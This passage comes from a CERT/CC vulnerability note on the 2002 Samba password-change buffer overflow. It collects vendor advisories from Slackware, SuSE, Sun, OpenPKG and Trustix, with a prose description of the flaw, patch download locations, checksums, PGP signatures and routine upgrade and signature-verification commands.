to the mail program that you are finished composing the \nmail message. \n` \n \n` ------oOo------ \n` \n`SGI provides a comprehensive customer World Wide Web site. This site is \nlocated at ``<http://www.sgi.com/support/security/>`` . \n` \n` ------oOo------ \n` \n`If there are general security questions on SGI systems, email can be sent to \nsecurity-info@sgi.com. \n` \n`For reporting *NEW* SGI security issues, email can be sent to \nsecurity-alert@sgi.com or contact your SGI support provider. A support \ncontract is not required for submitting a security report. \n` \n`______________________________________________________________________________ \nThis information is provided freely to all interested parties \nand may be redistributed provided that it is not altered in any \nway, SGI is appropriately credited and the document retains and \nincludes its valid PGP signature. \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: 2.6.2 \n` \n`iQCVAwUBPe+J4LQ4cFApAP75AQEZfAP+Pnm7uYFMAQHtMCa8Bzk+uNMWmt8qxvwb \nOguoHlb8Sh81NiY6Y/SsvBB+aBADw7PwiVfd9eHU/KZL38I8a0nnB2kMrqady8fR \nERieXRJKPqs2BnOtUgbdBqgBnRu9Vf39K9IDWKV+iiL3j6LpmOmnBnfa40jIwwSP \nPl9jBQcLlxE= \n=keNO \n-----END PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23958321 Feedback>).\n\n### __ __ Slackware\n\nUpdated: December 13, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`New Samba packages are available for Slackware 8.1 and -current to fix a security problem and provide other bugfixes and improvements. \n`\n\n`Here are the details from the Slackware 8.1 ChangeLog: \n` \n`---------------------------- \nWed Nov 20 16:51:23 PST 2002 \npatches/packages/samba-2.2.7-i386-1.tgz: Upgraded to samba-2.2.7. \nSome details (based on the WHATSNEW.txt file included in samba-2.2.7): \nThis fixes a security hole discovered in versions 2.2.2 through 2.2.6 of \nSamba that could potentially allow an attacker to gain root access \non the target machine. The word \"potentially\" is used because there \nis no known exploit of this bug, and the Samba Team has not been able to \ncraft one ourselves. However, the seriousness of the problem warrants \nthis immediate 2.2.7 release. There was a bug in the length checking for \nencrypted password change requests from clients. A client could potentially \nsend an encrypted password, which, when decrypted with the old hashed \npassword could be used as a buffer overrun attack on the stack of smbd. The \nattack would have to be crafted such that converting a DOS codepage string \nto little endian UCS2 unicode would translate into an executable block of \ncode. Thanks to Steve Langasek <vorlon@debian.org> and Eloy Paris \n<peloy@debian.org> for bringing this vulnerability to our notice. \n(* Security fix *) \n---------------------------- \n` \n \n`WHERE TO FIND THE NEW PACKAGES: \n------------------------------- \nUpdated Samba package for Slackware 8.1: \n``<ftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/samba-2.2.7-i386-1.tgz>`` \n` \n`Updated Samba package for Slackware-current: \n``<ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/samba-2.2.7-i386-1.tgz>`` \n` \n \n`MD5 SIGNATURES: \n--------------- \n` \n`Here are the md5sums for the packages: \n` \n`Slackware 8.1: \n835f2069561251cf9649b1f60ebc21f0 samba-2.2.7-i386-1.tgz \n` \n`Slackware-current: \n18eff1898b289735c51895e628797733 samba-2.2.7-i386-1.tgz \n`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23958321 Feedback>).\n\n### __ __ SuSE Inc.\n\nUpdated: December 13, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \n`\n\n`______________________________________________________________________________ \n` \n` SuSE Security Announcement \n` \n` Package: samba \nAnnouncement-ID: SuSE-SA:2002:045 \nDate: Wednesday, November 20th 2002 16:00 MET \nAffected products: 7.2, 7.3, 8.0, 8.1 \nSuSE Linux Database Server, \nSuSE eMail Server III, 3.1 \nSuSE Linux Enterprise Server 7+8, \nSuSE Linux Firewall on CD/Admin host \nSuSE Linux Connectivity Server \nSuSE Linux Office Server \nVulnerability Type: possible remote code execution \nSeverity (1-10): 7 \nSuSE default package: no \nCross References: ``<http://www.samba.org/>`` \n` \n` Content of this advisory: \n1) security vulnerability resolved: samba \nproblem description, discussion, solution and upgrade information \n2) pending vulnerabilities, solutions, workarounds \n3) standard appendix (further information) \n` \n`______________________________________________________________________________ \n` \n`1) problem description, brief discussion, solution, upgrade information \n` \n` Samba developer Steve Langasek found a security problem in samba, the \nwidely known free implementation of the SMB protocol. \n` \n` The error consists of a buffer overflow in a commonly used routine \nthat accepts user input and may write up to 127 bytes past the end of \nthe buffer allocated with static length, leaving enough room for \nan exploit. The resulting vulnerability can be exploited locally \nin applications using the pam_smbpass Pluggable Authentication Module \n(PAM). It may be possible to exploit this vulnerability remotely, \ncausing the running smbd to crash or even to execute arbitrary code. \n` \n` The samba package is installed by default only on the SuSE Linux \nEnterprise Server. SuSE Linux products do not have the samba and \nsamba-client packages installed by default. \nThe samba packages in SuSE Linux version 7.1 and before are not affected \nby this vulnerability. \nFor the bug to be exploited, your system has to be running the smbd \nsamba server, or an administrator must have (manually) changed the \nconfiguration of the PAM authentification subsystem to enable the use \nof the pam_smbpass module. The samba server process(es) are not activated \nautomatically after installation (of the package). \n` \n` The samba subsystem on SuSE products is split into two different \nsubpackages: samba and smbclnt up to and including SuSE Linux 7.2, on \nSuSE Linux 7.3 and newer the package names are samba and samba-client. \nTo completely remove the vulnerability, you should update all of the \ninstalled packages. \n` \n` We wish to express our gratitude to the samba development team and \nin particular to Steve Langasek and Volker Lendecke who provided the \npatches and communicated them to the vendors. Please know that the \nsamba team will release the new version 2.2.7 of the samba software to \naddress the security fix at the same time as this announcement gets \npublished. More information about samba (and the security fix) is \navailable at ``<http://www.samba.org>``. \n` \n` Please download the update package for your distribution and verify its \nintegrity by the methods listed in section 3) of this announcement. \nThen, install the package using the command \"rpm -Fhv file.rpm\" to apply \nthe update. \nOur maintenance customers are being notified individually. The packages \nare being offered to install from the maintenance web. \n` \n` SPECIAL INSTALL INSTRUCTIONS: \n============================== \nAfter successfully installing the update packages, you should restart \nthe samba server process(es) to make the changes in the system effective. \nIf you do not have a samba server running on your system, no further \naction is required. If you have a samba server running, please run the \nfollowing command as root: \nrcsmb restart # SuSE Linux, all versions \nrcnmb restart # only on SuSE Linux 8.1 \n` \n \n \n` Intel i386 Platform: \n` \n` SuSE-8.1: \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/samba-2.2.5-124.i586.rpm>`` \nf0a94ef6cc49165d4dace59caaf359d7 \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/samba-client-2.2.5-124.i586.rpm>`` \nf694fb4aaabffa98b6a76941cb2c0eaf \npatch rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/samba-2.2.5-124.i586.patch.rpm>`` \naf43bc1d5dc1b097389933f34ca5a625 \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/samba-client-2.2.5-124.i586.patch.rpm>`` \nbff278f9366df7efe72fa880c4f7618f \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/samba-2.2.5-124.src.rpm>`` \n674adb466663259c2117852b9525a29a \n` \n` SuSE-8.0: \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.0/n2/samba-2.2.3a-165.i386.rpm>`` \n8c7edd09c5acfc269467ecbcdcdfc21c \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/samba-client-2.2.3a-165.i386.rpm>`` \nbfc08a1d64f0d85670041c7046d1e775 \npatch rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.0/n2/samba-2.2.3a-165.i386.patch.rpm>`` \n7d08c2c07137d9da0b3d1a301295a084 \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/samba-client-2.2.3a-165.i386.patch.rpm>`` \n887230d4ed61bec496dff73c50fa3de0 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/samba-2.2.3a-165.src.rpm>`` \nb208c4d5bcceb7f9cc18df75b7831d2d \n` \n` SuSE-7.3: \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.3/n2/samba-2.2.1a-206.i386.rpm>`` \ndc4232333a0babbb257cff346609625f \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.3/n1/samba-client-2.2.1a-206.i386.rpm>`` \n163a565a5a0b0320eae6ba1d0ebdfb27 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/samba-2.2.1a-206.src.rpm>`` \n6086e3bb296a320c28fced9068c931fc \n` \n` SuSE-7.2: \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.2/n2/samba-2.2.0a-45.i386.rpm>`` \n184b17987ca99325782f4c7f9e04b6a6 \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.2/n1/smbclnt-2.2.0a-45.i386.rpm>`` \nb9926ade015ccaf271088da246814abb \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/samba-2.2.0a-45.src.rpm>`` \n384ec49b0b8a81d8ecf7c84ef0fa2689 \n` \n \n \n \n` Sparc Platform: \n` \n` SuSE-7.3: \n``<ftp://ftp.suse.com/pub/suse/sparc/update/7.3/n2/samba-2.2.1a-69.sparc.rpm>`` \n61b72787bc8e0b333662962a60bce0c2 \n``<ftp://ftp.suse.com/pub/suse/sparc/update/7.3/n1/samba-client-2.2.1a-69.sparc.rpm>`` \n6acd0ffd218d721d7c10b17e1194738d \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/samba-2.2.1a-69.src.rpm>`` \n77f57a3277bb1a270ae79bc94ee28345 \n` \n \n \n` PPC Power PC Platform: \n` \n` SuSE-7.3: \n``<ftp://ftp.suse.com/pub/suse/ppc/update/7.3/n2/samba-2.2.1a-141.ppc.rpm>`` \nd127afabc7d5b764289f9b65ad4c4cd1 \n``<ftp://ftp.suse.com/pub/suse/ppc/update/7.3/n1/samba-client-2.2.1a-141.ppc.rpm>`` \n894132f3b5041a54ec871d67eef072e5 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/samba-2.2.1a-141.src.rpm>`` \nccff812fdddd3af9d62a399f63e0405e \n` \n \n \n \n`______________________________________________________________________________ \n` \n`2) Pending vulnerabilities in SuSE Distributions and Workarounds: \n` \n` - 7.0 update trees \nWe will move the SuSE Linux 7.0 update tree structure to the \n/pub/suse/discontinued/ tree shortly, following the announcement about \ndiscontinued products on Tue, 29 Oct 2002. \n` \n`______________________________________________________________________________ \n` \n`3) standard appendix: authenticity verification, additional information \n` \n` - Package authenticity verification: \n` \n` SuSE update packages are available on many mirror ftp servers all over \nthe world. While this service is being considered valuable and important \nto the free and open source software community, many users wish to be \nsure about the origin of the package and its content before installing \nthe package. There are two verification methods that can be used \nindependently from each other to prove the authenticity of a downloaded \nfile or rpm package: \n1) md5sums as provided in the (cryptographically signed) announcement. \n2) using the internal gpg signatures of the rpm package. \n` \n` 1) execute the command \nmd5sum <name-of-the-file.rpm> \nafter you downloaded the file from a SuSE ftp server or its mirrors. \nThen, compare the resulting md5sum with the one that is listed in the \nannouncement. Since the announcement containing the checksums is \ncryptographically signed (usually using the key security@suse.de), \nthe checksums show proof of the authenticity of the package. \nWe disrecommend to subscribe to security lists which cause the \nemail message containing the announcement to be modified so that \nthe signature does not match after transport through the mailing \nlist software. \nDownsides: You must be able to verify the authenticity of the \nannouncement in the first place. If RPM packages are being rebuilt \nand a new version of a package is published on the ftp server, all \nmd5 sums for the files are useless. \n` \n` 2) rpm package signatures provide an easy way to verify the authenticity \nof an rpm package. Use the command \nrpm -v --checksig <file.rpm> \nto verify the signature of the package, where <file.rpm> is the \nfilename of the rpm package that you have downloaded. Of course, \npackage authenticity verification can only target an un-installed rpm \npackage file. \nPrerequisites: \na) gpg is installed \nb) The package is signed using a certain key. The public part of this \nkey must be installed by the gpg program in the directory \n~/.gnupg/ under the user's home directory who performs the \nsignature verification (usually root). You can import the key \nthat is used by SuSE in rpm packages for SuSE Linux by saving \nthis announcement to a file (\"announcement.txt\") and \nrunning the command (do \"su -\" to be root): \ngpg --batch; gpg < announcement.txt | gpg --import \nSuSE Linux distributions version 7.1 and thereafter install the \nkey \"build@suse.de\" upon installation or upgrade, provided that \nthe package gpg is installed. The file containing the public key \nis placed at the top-level directory of the first CD (pubring.gpg) \nand at ``<ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de>`` . \n` \n \n` - SuSE runs two security mailing lists to which any interested party may \nsubscribe: \n` \n` suse-security@suse.com \n- general/linux/SuSE security discussion. \nAll SuSE security announcements are sent to this list. \nTo subscribe, send an email to \n<suse-security-subscribe@suse.com>. \n` \n` suse-security-announce@suse.com \n- SuSE's announce-only mailing list. \nOnly SuSE's security announcements are sent to this list. \nTo subscribe, send an email to \n<suse-security-announce-subscribe@suse.com>. \n` \n` For general information or the frequently asked questions (faq) \nsend mail to: \n<suse-security-info@suse.com> or \n<suse-security-faq@suse.com> respectively. \n` \n` ===================================================================== \nSuSE's security contact is <security@suse.com> or <security@suse.de>. \nThe <security@suse.de> public key is listed below. \n===================================================================== \n______________________________________________________________________________ \n` \n` The information in this advisory may be distributed or reproduced, \nprovided that the advisory is not modified in any way. In particular, \nit is desired that the clear-text signature shows proof of the \nauthenticity of the text. \nSuSE Linux AG makes no warranties of any kind whatsoever with respect \nto the information contained in this security advisory. \n` \n`Type Bits/KeyID Date User ID \npub 2048R/3D25D3D9 1999-03-06 SuSE Security Team <security@suse.de> \npub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <build@suse.de> \n` \n`- -----BEGIN PGP PUBLIC KEY BLOCK----- \nVersion: GnuPG v1.0.6 (GNU/Linux) \nComment: For info see ``<http://www.gnupg.org>`` \n` \n`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` \n`/LoUC20EdCHUqn6v+M9t/WZgC+WNR8cq69uDy3YQhDP/nIan6fm2uf2kSV9A7ZxE \nGrwsWl/WX5Q/sQqMWaU6r4az98X3z90/cN+eJJ3vwtA+rm+nxEvyev+jaLuOQBDf \nebh/XA4FZ35xmi+spdiVeJH4F/ubaGlmj7+wDOF3suYAPSXT2QAFEbQlU3VTRSBT \nZWN1cml0eSBUZWFtIDxzZWN1cml0eUBzdXNlLmRlPokBFQMFEDbhLUfkWLKHsco8 \nRQEBVw4H/1vIdiOLX/7hdzYaG9crQVIk3QwaB5eBbjvLEMvuCZHiY2COUg5QdmPQ \n8SlWNZ6k4nu1BLcv2g/pymPUWP9fG4tuSnlUJDrWGm3nhyhAC9iudP2u1YQY37Gb \nB6NPVaZiYMnEb4QYFcqv5c/r2ghSXUTYk7etd6SW6WCOpEqizhx1cqDKNZnsI/1X \n11pFcO2N7rc6byDBJ1T+cK+F1Ehan9XBt/shryJmv04nli5CXQMEbiqYYMOu8iaA \n8AWRgXPCWqhyGhcVD3LRhUJXjUOdH4ZiHCXaoF3zVPxpeGKEQY8iBrDeDyB3wHmj \nqY9WCX6cmogGQRgYG6yJqDalLqrDOdmJARUDBRA24S0Ed7LmAD0l09kBAW04B/4p \nWH3f1vQn3i6/+SmDjGzUu2GWGq6Fsdwo2hVM2ym6CILeow/K9JfhdwGvY8LRxWRL \nhn09j2IJ9P7H1Yz3qDf10AX6V7YILHtchKT1dcngCkTLmDgC4rs1iAAl3f089sRG \nBafGPGKv2DQjHfR1LfRtbf0P7c09Tkej1MP8HtQMW9hPkBYeXcwbCjdrVGFOzqx+ \nAvvJDdT6a+oyRMTFlvmZ83UV5pgoyimgjhWnM1V4bFBYjPrtWMkdXJSUXbR6Q7Pi \nRZWCzGRzwbaxqpl3rK/YTCphOLwEMB27B4/fcqtBzgoMOiaZA0M5fFoo54KgRIh0 \nzinsSx2OrWgvSiLEXXYKiEYEEBECAAYFAjseYcMACgkQnkDjEAAKq6ROVACgjhDM \n/3KM+iFjs5QXsnd4oFPOnbkAnjYGa1J3em+bmV2aiCdYXdOuGn4ZiQCVAwUQN7c7 \nwhaQN/7O/JIVAQEB+QP/cYblSAmPXxSFiaHWB+MiUNw8B6ozBLK0QcMQ2YcL6+Vl \nD+nSZP20+Ja2nfiKjnibCv5ss83yXoHkYk2Rsa8foz6Y7tHwuPiccvqnIC/c9Cvz \ndbIsdxpfsi0qWPfvX/jLMpXqqnPjdIZErgxpwujas1n9016PuXA8K3MJwVjCqSKI \nRgQQEQIABgUCOhpCpAAKCRDHUqoysN/3gCt7AJ9adNQMbmA1iSYcbhtgvx9ByLPI \nDgCfZ5Wj+f7cnYpFZI6GkAyyczG09sE= \n=LRKC \n- -----END PGP PUBLIC KEY BLOCK----- \n` \n \n`-----BEGIN PGP SIGNATURE----- \nVersion: 2.6.3i \nCharset: noconv \n` \n`iQEVAwUBPdvAOHey5gA9JdPZAQFBcwf6A+8lmCVrRiCgRW/SH+pzBMJ2+p8iywDd \nBhChCR0ekyrNcxwMRut1vFVRbt0iSzD3Kl43dAPOrTcvypkoBnxW4+/l1mD7/fqH \nWsF22vwhV/8u33tYFN7wsUxpBHzBSq3CguJF4XP5BpNCkvJvrLh5f5QDgonUoO+P \n2z0sYNgSARxEKgniyp8YSm6UmC63ijzDhLb/JuDxNu/8652Xx35pptdOtBiriB9C \nyGKgJoy97co96oQrzS9ZRKjSGBfE5g6Q8/nAyDuCFpPOiIvDaLlkcab0u2Boawe+ \nGuCM6QwB7xmb6ElCehtCGxn9v6gE86hNFCOVrjIOhKgOrlY0V8h21w== \n=MrgG \n-----END PGP SIGNATURE----- \n`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23958321 Feedback>).\n\n### __ __ Sun Microsystems Inc.\n\nUpdated: May 16, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nSun includes a version of Samba with Solaris 9 which is affected by this issue. Sun provides Samba on the Solaris Companion CD for Solaris 2.6, 7, and 8: \n\n\n<http://wwws.sun.com/software/solaris/freeware/index.html> \n \nas an unsupported package which installs to /opt/sfw and is vulnerable to this issue too. Sites using the freeware version of Samba from the Solaris Companion CD will have to upgrade to a later version from Samba.org. Sun has published Sun Alert 53580 for this issue describing the patches and workaround options here: \n \n<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert/53580>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [Sun Alert 53580](<http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F53580&zone_32=category%3Asecurity>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23958321 Feedback>).\n\n### __ __ The OpenPKG Project\n\nUpdated: December 13, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`________________________________________________________________________ \n` \n`OpenPKG Security Advisory The OpenPKG Project \n``<http://www.openpkg.org/security.html>`` ``<http://www.openpkg.org>`` \nopenpkg-security@openpkg.org openpkg@openpkg.org \nOpenPKG-SA-2002.012 29-Nov-2002 \n________________________________________________________________________ \n` \n`Package: samba \nVulnerability: code execution, root exploit \nOpenPKG Specific: no \n` \n`Dependent Packages: none \n` \n`Affected Releases: Affected Packages: Corrected Packages: \nOpenPKG 1.0 <= samba-2.2.2-1.0.0 >= samba-2.2.2-1.0.1 \nOpenPKG 1.1 <= samba-2.2.5-1.1.0 >= samba-2.2.5-1.1.1 \nOpenPKG CURRENT <= samba-2.2.6-20021017 >= samba-2.2.7-20021120 \n` \n`Description: \nA vulnerability in Samba [0] versions 2.2.2 through 2.2.6 was \ndiscovered by the Debian Samba maintainers [1]. A bug in the \nlength checking for encrypted password change requests from clients \ncould be exploited using a buffer overrun attack on the smbd(8) \nstack. This attack would have to be crafted in such a way that \nconverting a DOS codepage string to little endian UCS2 unicode \nwould translate into an executable block of code. \n` \n` Check whether you are affected by running \"<prefix>/bin/rpm -q \nsamba\". If you have an affected version of the samba package (see \nabove), please upgrade it according to the solution below. \n` \n`Solution: \nUpdate existing packages to newly patched versions of Samba. Select the \nupdated source RPM appropriate for your OpenPKG release [2][3][4], and \nfetch it from the OpenPKG FTP service or a mirror location. Verify its \nintegrity [5], build a corresponding binary RPM from it and update your \nOpenPKG installation by applying the binary RPM [6]. For the latest \nOpenPKG 1.1 release, perform the following operations to permanently fix \nthe security problem (for other releases adjust accordingly). \n` \n` $ ftp ftp.openpkg.org \nftp> bin \nftp> cd release/1.1/UPD \nftp> get samba-2.2.5-1.1.1.src.rpm \nftp> bye \n$ <prefix>/bin/rpm -v --checksig samba-2.2.5-1.1.1.src.rpm \n$ <prefix>/bin/rpm --rebuild samba-2.2.5-1.1.1.src.rpm \n$ su - \n# <prefix>/bin/rpm -Fvh <prefix>/RPM/PKG/samba-2.2.5-1.1.1.*.rpm \n# <prefix>/etc/rc samba stop start \n________________________________________________________________________ \n` \n`References: \n[0] ``<http://www.samba.org/>`` \n[1] ``<http://www.debian.org/security/2002/dsa-200>`` \n[2] ``<ftp://ftp.openpkg.org/release/1.0/UPD/>`` \n[3] ``<ftp://ftp.openpkg.org/release/1.1/UPD/>`` \n[4] ``<ftp://ftp.openpkg.org/current/SRC/>`` \n[5] ``<http://www.openpkg.org/security.html#signature>`` \n[6] ``<http://www.openpkg.org/tutorial.html#regular-source>`` \n________________________________________________________________________ \n` \n`For security reasons, this advisory was digitally signed with \nthe OpenPGP public key \"OpenPKG <openpkg@openpkg.org>\" (ID 63C4CB9F) \nof the OpenPKG project which you can find under the official URL \n``<http://www.openpkg.org/openpkg.pgp>`` or on ``<http://keyserver.pgp.com/>``. To \ncheck the integrity of this advisory, verify its digital signature by \nusing GnuPG (``<http://www.gnupg.org/>``). For example, pipe this message to \nthe command \"gpg --verify --keyserver keyserver.pgp.com\". \n________________________________________________________________________ \n` \n`-----BEGIN PGP SIGNATURE----- \nComment: OpenPKG <openpkg@openpkg.org> \n` \n`iEYEARECAAYFAj3nO9UACgkQgHWT4GPEy59p5QCfct5flSu1iV1a7dJGasM0J8iN \nkOMAoNvn9Q1524xufDzZb12THUscFpKd \n=HEHz \n-----END PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23958321 Feedback>).\n\n### __ __ Trustix Secure Linux\n\nUpdated: December 13, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`- -------------------------------------------------------------------------- \nTrustix Secure Linux Security Advisory #2002-0080 \n` \n`Package name: samba \nSummary: Remote hole \nDate: 2002-11-21 \nAffected versions: TSL 1.5 \n` \n`- -------------------------------------------------------------------------- \nPackage description: \nSamba provides an SMB server which can be used to provide network \nservices to SMB (sometimes called \"Lan Manager\") clients, including \nvarious versions of MS Windows, OS/2, and other Linux machines. Samba \nuses NetBIOS over TCP/IP (NetBT) protocols and does NOT need NetBEUI \n(Microsoft Raw NetBIOS frame) protocol. \n` \n \n`Problem description: \nFrom the Samba 2.2.7 release notes: \n` \n` There was a bug in the length checking for encrypted password change \nrequests from clients. A client could potentially send an encrypted \npassword, which, when decrypted with the old hashed password could be \nused as a buffer overrun attack on the stack of smbd. The attach would \nhave to be crafted such that converting a DOS codepage string to little \nendian UCS2 unicode would translate into an executable block of code. \n` \n` All versions of Samba between 2.2.2 to 2.2.6 inclusive are vulnerable \nto this problem. This version of Samba 2.2.7 contains a fix for this \nproblem. \n` \n \n`Action: \nWe recommend that all systems with this package installed be upgraded. \nPlease note that if you do not need the functionality provided by this \npackage, you may want to remove it from your system. \n` \n \n`Location: \nAll TSL updates are available from \n<URI:``<http://www.trustix.net/pub/Trustix/updates/>``> \n<URI:``<ftp://ftp.trustix.net/pub/Trustix/updates/>``> \n` \n \n`About Trustix Secure Linux: \nTrustix Secure Linux is a small Linux distribution for servers. With \nfocus on security and stability, the system is painlessly kept safe \nand up to date from day one using swup, the automated software updater. \n` \n \n`Automatic updates: \nUsers of the SWUP tool can enjoy having updates automatically \ninstalled using 'swup --upgrade'. \n` \n` Get SWUP from: \n<URI:``<ftp://ftp.trustix.net/pub/Trustix/software/swup/>``> \n` \n \n`Public testing: \nThese packages have been available for public testing for some time. \nIf you want to contribute by testing the various packages in the \ntesting tree, please feel free to share your findings on the \ntsl-discuss mailinglist. \nThe testing tree is located at \n<URI:``<http://www.trustix.net/pub/Trustix/testing/>``> 